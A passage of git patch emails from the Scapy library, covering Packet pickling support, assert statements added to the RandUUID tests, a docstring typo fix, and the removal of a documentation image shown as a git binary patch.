Optional[str], + Optional[int] + ] + + def __reduce__(self): + # type: () -> Tuple[Packet_metaclass, Tuple[()], Packet._PickleType] + """Used by pickling methods""" + return (self.__class__, (), ( + self.build(), + self.time, + self.sent_time, + self.direction, + self.sniffed_on, + self.wirelen, + )) + + def __getstate__(self): + # type: () -> Packet._PickleType + """Mark object as pickable""" + return self.__reduce__()[2] + + def __setstate__(self, state): + # type: (Packet._PickleType) -> Packet + """Rebuild state using pickable methods""" + self.__init__(state[0]) # type: ignore + self.time = state[1] + self.sent_time = state[2] + self.direction = state[3] + self.sniffed_on = state[4] + self.wirelen = state[5] + return self + + def __deepcopy__(self, + memo, # type: Any + ): + # type: (...) -> Packet + """Used by copy.deepcopy""" + return self.copy() + def init_fields(self): # type: () -> None """ @@ -2524,7 +2533,7 @@ def fuzz(p, # type: Packet q = p while not isinstance(q, NoPayload): new_default_fields = {} - multiple_type_fields = [] + multiple_type_fields = [] # type: List[str] for f in q.fields_desc: if isinstance(f, PacketListField): for r in getattr(q, f.name): From 0be72709025d4dd2febd97f429bb521e88860ec3 Mon Sep 17 00:00:00 2001 From: Thomas Faivre Date: Mon, 28 Sep 2020 13:15:45 +0200 Subject: [PATCH 0290/1632] test: add missing assert statements in RandUUID tests Tests currently returns (using UTscapy which means "prints" just like a normal console) True/False instead of raising an exception. Therefore, errors cannot be detected. Add missing 'assert' statements in RandUUID section. Signed-off-by: Thomas Faivre --- test/regression.uts | 100 ++++++++++++++++++++++---------------------- 1 file changed, 50 insertions(+), 50 deletions(-) diff --git a/test/regression.uts b/test/regression.uts index 038a987654e..fd2817079e2 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -13009,122 +13009,122 @@ RANDUUID_FIXED = uuid.uuid4() = RandUUID default behaviour u = RandUUID()._fix() -u.version == 4 +assert u.version == 4 = RandUUID incorrect implicit args -expect_exception(ValueError, lambda: RandUUID(node=0x1234, name="scapy")) -expect_exception(ValueError, lambda: RandUUID(node=0x1234, namespace=uuid.uuid4())) -expect_exception(ValueError, lambda: RandUUID(clock_seq=0x1234, name="scapy")) -expect_exception(ValueError, lambda: RandUUID(clock_seq=0x1234, namespace=uuid.uuid4())) -expect_exception(ValueError, lambda: RandUUID(name="scapy")) -expect_exception(ValueError, lambda: RandUUID(namespace=uuid.uuid4())) +assert expect_exception(ValueError, lambda: RandUUID(node=0x1234, name="scapy")) +assert expect_exception(ValueError, lambda: RandUUID(node=0x1234, namespace=uuid.uuid4())) +assert expect_exception(ValueError, lambda: RandUUID(clock_seq=0x1234, name="scapy")) +assert expect_exception(ValueError, lambda: RandUUID(clock_seq=0x1234, namespace=uuid.uuid4())) +assert expect_exception(ValueError, lambda: RandUUID(name="scapy")) +assert expect_exception(ValueError, lambda: RandUUID(namespace=uuid.uuid4())) = RandUUID v4 UUID (correct args) u = RandUUID(version=4)._fix() -u.version == 4 +assert u.version == 4 u2 = RandUUID(version=4)._fix() -u2.version == 4 +assert u2.version == 4 -str(u) != str(u2) +assert str(u) != str(u2) = RandUUID v4 UUID (incorrect args) -expect_exception(ValueError, lambda: RandUUID(version=4, template=RANDUUID_TEMPLATE)) -expect_exception(ValueError, lambda: RandUUID(version=4, node=0x1234)) -expect_exception(ValueError, lambda: RandUUID(version=4, clock_seq=0x1234)) -expect_exception(ValueError, lambda: RandUUID(version=4, namespace=uuid.uuid4())) -expect_exception(ValueError, lambda: RandUUID(version=4, name="scapy")) +assert expect_exception(ValueError, lambda: RandUUID(version=4, template=RANDUUID_TEMPLATE)) +assert expect_exception(ValueError, lambda: RandUUID(version=4, node=0x1234)) +assert expect_exception(ValueError, lambda: RandUUID(version=4, clock_seq=0x1234)) +assert expect_exception(ValueError, lambda: RandUUID(version=4, namespace=uuid.uuid4())) +assert expect_exception(ValueError, lambda: RandUUID(version=4, name="scapy")) = RandUUID v1 UUID u = RandUUID(version=1)._fix() -u.version == 1 +assert u.version == 1 u = RandUUID(version=1, node=0x1234)._fix() -u.version == 1 -u.node == 0x1234 +assert u.version == 1 +assert u.node == 0x1234 u = RandUUID(version=1, clock_seq=0x1234)._fix() -u.version == 1 -u.clock_seq == 0x1234 +assert u.version == 1 +assert u.clock_seq == 0x1234 u = RandUUID(version=1, node=0x1234, clock_seq=0x1bcd)._fix() -u.version == 1 -u.node == 0x1234 -u.clock_seq == 0x1bcd +assert u.version == 1 +assert u.node == 0x1234 +assert u.clock_seq == 0x1bcd = RandUUID v1 UUID (implicit version) u = RandUUID(node=0x1234)._fix() -u.version == 1 -u.node == 0x1234 +assert u.version == 1 +assert u.node == 0x1234 u = RandUUID(clock_seq=0x1234)._fix() -u.version == 1 -u.clock_seq == 0x1234 +assert u.version == 1 +assert u.clock_seq == 0x1234 u = RandUUID(node=0x1234, clock_seq=0x1bcd)._fix() -u.version == 1 -u.node == 0x1234 -u.clock_seq == 0x1bcd +assert u.version == 1 +assert u.node == 0x1234 +assert u.clock_seq == 0x1bcd = RandUUID v1 UUID (incorrect args) -expect_exception(ValueError, lambda: RandUUID(version=1, template=RANDUUID_TEMPLATE)) -expect_exception(ValueError, lambda: RandUUID(version=1, namespace=uuid.uuid4())) -expect_exception(ValueError, lambda: RandUUID(version=1, name="scapy")) +assert expect_exception(ValueError, lambda: RandUUID(version=1, template=RANDUUID_TEMPLATE)) +assert expect_exception(ValueError, lambda: RandUUID(version=1, namespace=uuid.uuid4())) +assert expect_exception(ValueError, lambda: RandUUID(version=1, name="scapy")) = RandUUID v5 UUID u = RandUUID(version=5, namespace=RANDUUID_FIXED, name="scapy")._fix() -u.version == 5 +assert u.version == 5 u2 = RandUUID(version=5, namespace=RANDUUID_FIXED, name="scapy")._fix() -u2.version == 5 -u.bytes == u2.bytes +assert u2.version == 5 +assert u.bytes == u2.bytes # implicit v5 u2 = RandUUID(namespace=RANDUUID_FIXED, name="scapy")._fix() -u.bytes == u2.bytes +assert u.bytes == u2.bytes = RandUUID v5 UUID (incorrect args) -expect_exception(ValueError, lambda: RandUUID(version=5, template=RANDUUID_TEMPLATE)) -expect_exception(ValueError, lambda: RandUUID(version=5, node=0x1234)) -expect_exception(ValueError, lambda: RandUUID(version=5, clock_seq=0x1234)) +assert expect_exception(ValueError, lambda: RandUUID(version=5, template=RANDUUID_TEMPLATE)) +assert expect_exception(ValueError, lambda: RandUUID(version=5, node=0x1234)) +assert expect_exception(ValueError, lambda: RandUUID(version=5, clock_seq=0x1234)) = RandUUID v3 UUID u = RandUUID(version=3, namespace=RANDUUID_FIXED, name="scapy")._fix() -u.version == 3 +assert u.version == 3 u2 = RandUUID(version=3, namespace=RANDUUID_FIXED, name="scapy")._fix() -u2.version == 3 -u.bytes == u2.bytes +assert u2.version == 3 +assert u.bytes == u2.bytes # implicit v5 u2 = RandUUID(namespace=RANDUUID_FIXED, name="scapy")._fix() -u.bytes != u2.bytes +assert u.bytes != u2.bytes = RandUUID v3 UUID (incorrect args) -expect_exception(ValueError, lambda: RandUUID(version=5, template=RANDUUID_TEMPLATE)) -expect_exception(ValueError, lambda: RandUUID(version=5, node=0x1234)) -expect_exception(ValueError, lambda: RandUUID(version=5, clock_seq=0x1234)) +assert expect_exception(ValueError, lambda: RandUUID(version=5, template=RANDUUID_TEMPLATE)) +assert expect_exception(ValueError, lambda: RandUUID(version=5, node=0x1234)) +assert expect_exception(ValueError, lambda: RandUUID(version=5, clock_seq=0x1234)) = RandUUID looks like a UUID with str -re.match(r'[0-9a-f]{8}(-[0-9a-f]{4}){3}-[0-9a-f]{12}', str(RandUUID()), re.I) is not None +assert re.match(r'[0-9a-f]{8}(-[0-9a-f]{4}){3}-[0-9a-f]{12}', str(RandUUID()), re.I) is not None = RandUUID with a static part * RandUUID template can contain static part such a 01234567-89ab-*-01*-*****ef -re.match(r'01234567-89ab-[0-9a-f]{4}-01[0-9a-f]{2}-[0-9a-f]{10}ef', str(RandUUID('01234567-89ab-*-01*-*****ef')), re.I) is not None +assert re.match(r'01234567-89ab-[0-9a-f]{4}-01[0-9a-f]{2}-[0-9a-f]{10}ef', str(RandUUID('01234567-89ab-*-01*-*****ef')), re.I) is not None = RandUUID with a range part * RandUUID template can contain a part with a range of values such a 01234567-89ab-*-01*-****c0:c9ef -re.match(r'01234567-89ab-[0-9a-f]{4}-01[0-9a-f]{2}-[0-9a-f]{8}c[0-9]ef', str(RandUUID('01234567-89ab-*-01*-****c0:c9ef')), re.I) is not None +assert re.match(r'01234567-89ab-[0-9a-f]{4}-01[0-9a-f]{2}-[0-9a-f]{8}c[0-9]ef', str(RandUUID('01234567-89ab-*-01*-****c0:c9ef')), re.I) is not None ############ ############ From 9be1d1be688c376ad4ea4bcf640d6ebdcefb5242 Mon Sep 17 00:00:00 2001 From: nonylene Date: Mon, 28 Sep 2020 09:28:44 +0900 Subject: [PATCH 0291/1632] Fix typo in inet6.py Fix typo in inet6.py Update inet6.py; octet -> octets --- scapy/layers/inet6.py | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/scapy/layers/inet6.py b/scapy/layers/inet6.py index cc68b62e01e..0cad6202a7d 100644 --- a/scapy/layers/inet6.py +++ b/scapy/layers/inet6.py @@ -676,8 +676,8 @@ def alignment_delta(self, curpos): # By default, no alignment requirement """ As specified in section 4.2 of RFC 2460, every options has an alignment requirement usually expressed xn+y, meaning - the Option Type must appear at an integer multiple of x octest - from the start of the header, plus y octet. + the Option Type must appear at an integer multiple of x octets + from the start of the header, plus y octets. That function is provided the current position from the start of the header and returns required padding length. From 31a946644cd352b9cc55dd5870ef1226239fc234 Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Tue, 29 Sep 2020 12:24:50 +0000 Subject: [PATCH 0292/1632] Use scapy.net version chart --- doc/scapy/graphics/scapy_version_timeline.jpg | Bin 20845 -> 0 bytes doc/scapy/installation.rst | 7 ++++++- doc/scapy_version_timeline.ods | Bin 3764 -> 0 bytes 3 files changed, 6 insertions(+), 1 deletion(-) delete mode 100644 doc/scapy/graphics/scapy_version_timeline.jpg delete mode 100644 doc/scapy_version_timeline.ods diff --git a/doc/scapy/graphics/scapy_version_timeline.jpg b/doc/scapy/graphics/scapy_version_timeline.jpg deleted file mode 100644 index 840dbc04a1e67c44fb0afccab659af6eb50a1063..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 20845 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 